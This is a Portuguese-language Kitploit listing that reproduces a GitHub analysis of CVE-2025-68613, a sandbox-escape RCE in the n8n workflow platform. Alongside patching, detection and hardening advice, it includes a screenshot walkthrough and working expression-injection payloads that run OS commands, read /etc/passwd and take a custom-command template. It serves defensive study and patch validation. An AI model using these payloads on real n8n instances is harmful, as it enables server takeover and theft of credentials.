Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
CVE-2025-68613-n8n-rce-analysis — CVE-2025-68613 (n8n) Análise crítica de RCE + recomendações defensivas (validação de patch, ideias de detecção e dicas de hardening) | Kitploit
Ferramentas/GitHubGitHub/ak-cybe/cve-2025-68613-n8n-rce-analysis
Análise de VulnerabilidadesExploraçãoExploração de Aplicações WebTestes de PenetraçãoAprendizado e EducaçãoResposta a Incidentes
GitHubak-cybe/cve-2025-68613-n8n-rce-analysis

CVE-2025-68613-n8n-rce-analysis

CVE-2025-68613 (n8n) Análise crítica de RCE + recomendações defensivas (validação de patch, ideias de detecção e dicas de hardening)

Ver Repositório
11há 8 mesesAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

Banner de Cabeçalho

SVG de Digitação

Gravidade CVSS Instâncias Estado CWE

GIF de Hacker GIF de Matrix


Divisor

📑 Índice

  • 🎯 Resumo Executivo
  • 🐛 A Vulnerabilidade
  • 🔬 Análise Técnica
  • 💀 Passo a Passo de Exploração
  • 💥 Avaliação de Impacto
  • 🔍 Deteção e Resposta
  • 🛡️ Estratégia de Mitigação
  • 📚 Referências

🎯 Resumo Executivo

GIF de Alerta

CVE-2025-68613 é uma vulnerabilidade crítica de execução remota de código na plataforma de automação de workflows n8n que permite que atacantes autenticados executem comandos arbitrários no sistema através de injeção de expressão.

⚡ Estatísticas Rápidas

🔥 Métrica📊 Valor
Pontuação CVSS9.9 / 10
Instâncias Expostas103.476+
Complexidade do AtaqueBAIXA
Autenticação NecessáriaSim (Privilégio Baixo)
Interação do UtilizadorNenhuma

🎯 Factos-Chave

📌 Propriedade📝 Valor
Divulgado18 Dez 2025
VetorRede (AV:N)
ÂmbitoAlterado
ImpactoCIA = ALTO
Tipo de ExploitInjeção de Expressão

🐛 A Vulnerabilidade

GIF de Bug

📋 Visão Geral da CVE

PropriedadeValor
🆔 ID CVECVE-2025-68613
📊 Pontuação CVSS9.9 (Crítico) 🔴
🔗 Vetor CVSSCVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H
🏷️ CWECWE-913 (Controlo Inadequado de Recursos de Código Geridos Dinamicamente)
📦 Versões Afetadas0.211.0 → 1.120.3, 1.121.0
✅ Versões Corrigidas1.120.4, 1.121.1, 1.122.0+

🤖 O que é o n8n?

n8n é uma plataforma de automação de workflows open-source que permite integração no-code/low-code em mais de 400 aplicações. Está amplamente implantada em:

🏢 Caso de Uso📝 Descrição
🔧 DevOpsPipelines de automação, integrações CI/CD
🛡️ Operações de SegurançaWorkflows SOAR, resposta a incidentes
💼 NegóciosAutomação de processos, workflows de dados
📊 DadosProcessos ETL, integrações de API

🔧 Causa Raiz Técnica

root@kitploit:~
🔓 VULNERABILITY CHAIN:
┌─────────────────────────────────────────────────────────────────┐
│  📝 n8n Expression Language → Dynamic Data Handling            │
│                           ↓                                     │
│  ⚠️  Insufficient Sandbox Isolation in Server-Side Eval        │
│                           ↓                                     │
│  💀 Malicious Expression Escapes Sandbox                       │
│                           ↓                                     │
│  🖥️  Access to Node.js child_process Module                    │
│                           ↓                                     │
│  💥 FULL RCE - OS Command Execution                            │
└─────────────────────────────────────────────────────────────────┘

🔬 Análise Técnica

GIF de Análise

🎯 Superfície de Ataque

Pré-requisitos para Exploração:

#📋 Requisito📝 Detalhes
1️⃣AutenticaçãoConta de utilizador n8n válida (privilégio baixo é suficiente)
2️⃣PermissõesCapacidade de criar/editar workflows
3️⃣Acesso à RedeCapacidade de alcançar a instância n8n

⚔️ Características do Ataque

🏷️ Atributo📊 Valor🔥 Risco
ComplexidadeBAIXA (AC:L)🔴 Alto
Interação do UtilizadorNenhuma Necessária🔴 Alto
ÂmbitoAlterado🔴 Crítico

🗺️ Diagrama do Fluxo da Vulnerabilidade

root@kitploit:~
graph TD
    A[🔐 Utilizador Autenticado] -->|Cria| B[📝 Novo Workflow]
    B -->|Injeta| C[💀 Expressão Maliciosa]
    C -->|Aciona| D[⚡ Avaliação da Expressão]
    D -->|Explora| E[🔓 Fuga da Sandbox]
    E -->|Acede a| F[🖥️ Runtime Node.js]
    F -->|Executa| G[💥 Comando OS via child_process]
    G -->|Alcança| H[☠️ COMPROMETIMENTO TOTAL DO SERVIDOR]
    
    style A fill:#4CAF50,color:#fff
    style C fill:#ff9800,color:#fff
    style E fill:#f44336,color:#fff
    style H fill:#9c27b0,color:#fff

💀 Passo a Passo de Exploração

GIF de Hacking

⚠️ AVISO: O que se segue é apenas para fins educacionais. A exploração não autorizada é ilegal.

📸 Capturas de Ecrã Passo a Passo da Exploração

🖥️ Passo 1: Aceder à Instância n8n

Acesso inicial à plataforma de automação de workflows n8n vulnerável.

Tela de Boas-vindas do n8n
🔓 Painel de Boas-vindas do n8n - Ponto de Entrada


➕ Passo 2: Criar Novo Workflow

Criar um novo workflow que conterá o payload malicioso.

Criação de Novo Workflow
📝 A criar novo workflow com "Adicionar primeiro passo"


⚡ Passo 3: Adicionar Gatilho Manual

Configurar o gatilho do workflow - Gatilho Manual permite execução a pedido.

Configuração do Gatilho Manual
🎯 A selecionar Gatilho Manual para ativação do workflow


📦 Passo 4: Adicionar Nó Set

Adicionar o nó "Edit Fields (Set)" que conterá a expressão maliciosa.

Seleção do Nó Set
🔧 A adicionar nó "Edit Fields (Set)" para injeção do payload


💉 Passo 5: Injetar Payload RCE

O passo crítico - injetar a expressão de fuga da sandbox para alcançar RCE.

Execução do Payload RCE
💀 Expressão maliciosa executa comando 'id' com sucesso!

root@kitploit:~
// 🔴 MALICIOUS PAYLOAD (DO NOT USE ILLEGALLY)
{{ (function(){ return this.process.mainModule.require('child_process').execSync('id').toString(); })() }}

Saída Mostra: uid=1000(node) gid=1000(node) groups=1000(node) ✅ RCE CONFIRMADO!


💉 Exemplos de Payload

GIF de Injeção de Código

⚠️ AVISO: Estes payloads são apenas para testes de segurança autorizados. A utilização não autorizada é ilegal!

🔹 Comando ID (Informação do Utilizador)

root@kitploit:~
{{ (function(){ return this.process.mainModule.require('child_process').execSync('id').toString(); })() }}

🔹 Comando PWD (Diretório Atual)

root@kitploit:~
{{ (function(){ return this.process.mainModule.require('child_process').execSync('pwd').toString(); })() }}

🔹 Leitura de Ficheiro (/etc/passwd)

root@kitploit:~
{{ (function(){ return this.process.mainModule.require('child_process').execSync('cat /etc/passwd').toString(); })() }}

🔹 Template de Comando Personalizado

root@kitploit:~
{{ (function(){ return this.process.mainModule.require('child_process').execSync('YOUR_COMMAND_HERE').toString(); })() }}

📸 PoC de Exploração de Leitura de Ficheiro

exploração de leitura do ficheiro passwd
💀 A ler /etc/passwd - Acesso total ao sistema de ficheiros demonstrado!


📤 Saída Esperada

🎯 Payload📋 Saída Esperada
iduid=1000(node) gid=1000(node) groups=1000(node)
pwd/app
cat /etc/passwdLista completa de utilizadores do sistema (root, daemon, node, etc.)
envTodas as variáveis de ambiente incluindo segredos
ls -la /Listagem do sistema de ficheiros raiz

🔍 Análise da Causa Raiz

root@kitploit:~
┌─────────────────────────────────────────────────────────────────────────┐
│  🔴 VULNERABILITY ROOT CAUSE                                            │
├─────────────────────────────────────────────────────────────────────────┤
│                                                                         │
│  The n8n expression evaluator LACKS a sanitizer to prevent function     │
│  expressions from accessing:                                            │
│                                                                         │
│    ❌ this.process        → Node.js process object                      │
│    ❌ mainModule.require  → Module loading system                       │
│    ❌ child_process       → OS command execution                        │
│                                                                         │
│  This allows direct access to system modules and arbitrary code exec!   │
│                                                                         │
└─────────────────────────────────────────────────────────────────────────┘

💀 Resumo do Impacto

🎯 Tipo de Impacto📝 Descrição
💻 Execução de Comandos ArbitráriosExecutar qualquer comando OS
📂 Acesso ao Sistema de FicheirosLer/escrever qualquer ficheiro
🔑 Exposição de Variáveis de AmbienteChaves de API, segredos divulgados
☠️ Comprometimento Total do SistemaTomada total do servidor
🛡️ Gravidade📊 Classificação
Pontuação CVSS9.9 / 10
Complexidade do AtaqueBAIXA
Privilégios NecessáriosBAIXOS
Interação do UtilizadorNENHUMA

✅ Mitigação

Atualizar

root@kitploit:~
# 🛡️ Atualizar n8n para a versão corrigida
npm install -g n8n@latest

# Ou com Docker
docker pull n8n/n8n:1.122.0

🎬 Cadeia de Eliminação do Ataque

Fase🔥 Ação💀 Impacto
1️⃣Acesso InicialAutenticar no n8n
2️⃣ExecuçãoSubmeter workflow malicioso
3️⃣PersistênciaImplantar reverse shell/backdoor
4️⃣C2Estabelecer comando & controlo
5️⃣AçõesExfiltrar dados, movimento lateral

☠️ Capacidades de Pós-Exploração

🎯 Ação💥 Nível de Impacto
🔑 Roubo de CredenciaisExtrair chaves API, tokens OAuth, passwords BD
📤 Exfiltração de DadosDados de workflows, logs de execução, info de negócio
🔒 PersistênciaCron jobs, scripts de inicialização, web shells
🔀 Movimento LateralPivot para bases de dados, CI/CD, infra cloud
🗑️ Manipulação de WorkflowsModificar/destruir lógica de automação

💥 Avaliação de Impacto

GIF de Explosão

🔺 Análise da Tríade CIA

🔴 Confidencialidade (ALTA)

  • 🔑 Chaves API expostas
  • 🔐 Tokens OAuth divulgados
  • 💾 Passwords BD acessíveis
  • 📜 Logs de execução comprometidos

🟠 Integridade (ALTA)

  • 📝 Workflows alterados
  • ⚙️ Automação corrompida
  • 💉 Nós maliciosos injetados
  • 📊 Dados manipulados

🟡 Disponibilidade (ALTA)

  • ⏹️ Serviços interrompidos
  • 💀 Recursos esgotados
  • 🔄 Workflows terminados
  • 🖥️ Infraestrutura em baixo

🌍 Exposição no Mundo Real

Vulnerável


🔍 Deteção e Resposta

GIF de Detetive

🔎 Estratégias de Deteção

#📋 Método🔍 O que Monitorizar
📜Análise de LogsComandos invulgares do processo n8n, expressões falhadas
🌐RedeConexões de saída para IPs desconhecidos, grandes pedidos POST
⚡RuntimeInvocações de child_process, spawns inesperados
📦Auditoria de VersãoVerificar contra intervalo de versões vulneráveis

🛠️ Script de Auditoria de Versão

root@kitploit:~
#!/usr/bin/env bash
# 🔍 CVE-2025-68613 n8n version audit

echo "🔍 Checking n8n version..."

if command -v n8n >/dev/null 2>&1; then
    VER="$(n8n --version | tr -d 'v' | head -n1)"
    
    if [[ "$VER" < "1.120.4" ]] && [[ "$VER" >= "0.211.0" ]]; then
        echo "⚠️  VULNERABLE: n8n $VER affected by CVE-2025-68613"
        echo "📦 Required: Upgrade to 1.120.4, 1.121.1, or 1.122.0+"
        exit 2
    else
        echo "✅ SAFE: n8n $VER is patched"
    fi
else
    echo "❌ n8n not found in PATH"
fi

🚨 Lista de Verificação de Resposta a Incidentes

  • 🔌 Isolar - Desligar n8n afetado da rede
  • 💾 Preservar - Capturar logs e artefactos forenses
  • 🔍 Auditar - Rever todos os workflows para expressões maliciosas
  • 🔄 Rodar - Alterar todas as credenciais acessíveis
  • 🔀 Rever - Verificar indicadores de movimento lateral
  • 📦 Corrigir - Atualizar para versão segura antes da restauração

🛡️ Estratégia de Mitigação

GIF de Escudo

⚡ Ações Imediatas (Prioridade 0)

🔢 Prioridade🛠️ Ação📝 Detalhes
🔴 P0CORRIGIR AGORAAtualizar para 1.120.4, 1.121.1 ou 1.122.0+
🟠 P1Restringir AcessoLimitar criação de workflows a utilizadores de confiança
🟡 P2Reforço do ContentorImplantar com restrições de segurança

🐳 Exemplo de Reforço de Contentor

root@kitploit:~
# 🛡️ Hardened n8n deployment
FROM n8n/n8n:1.122.0

# 👤 Run as non-root user
USER node

# 🔒 Apply these runtime flags:
# --read-only --tmpfs /tmp:rw,noexec,nosuid
# --cap-drop=ALL --cap-add=NET_BIND_SERVICE
# --security-opt seccomp=n8n-seccomp.json

🔐 Segurança a Longo Prazo

🛡️ Medida📝 Implementação
🌐 Segmentação de RedeIsolar instâncias n8n
🔥 Regras WAFMonitorizar padrões de expressão
📜 Registo de AuditoriaAtivar registo abrangente
🔍 Revisões de SegurançaAvaliações regulares de workflows
🔓 Menor PrivilégioAplicar controlos de acesso

💬 Pergunta para Blue Teamers 🔵

GIF de Pensamento

Como conceberia uma regra de deteção para identificar tentativas de injeção de expressão em definições de workflow n8n antes da execução, considerando a necessidade de equilibrar segurança com uso legítimo de expressões dinâmicas?

Bónus: Que proteções de runtime implementaria para limitar o raio de explosão caso a fuga da sandbox ocorra apesar da correção?


📚 Referências

GIF de Livros

📋 Avisos Oficiais

  • 🔗 Detalhe NVD CVE-2025-68613
  • 🔗 Aviso Snyk

🔬 Análise Técnica

  • 📖 Orca Security: RCE Crítico no n8n
  • 📖 Resecurity: Mergulho Profundo em Injeção de Expressão
  • 📖 SecureLayer7: Guia de Exploração RCE

🎮 Recursos Práticos

  • 🧪 TryHackMe: Laboratório CVE-2025-68613
  • 💀 Scanner PoC Público

🏷️ Tags

root@kitploit:~
#CVE-2025-68613 #n8n #RCE #Expression-Injection #Workflow-Automation 
#Sandbox-Escape #CWE-913 #Critical-Vulnerability #Pentesting #Blue-Team

Rodapé

⚠️ AVISO: Esta análise é apenas para fins educacionais e de segurança defensiva.
A exploração não autorizada de vulnerabilidades é ILEGAL.

Autor Última Atualização

Visualizações do Perfil

Baixar ferramenta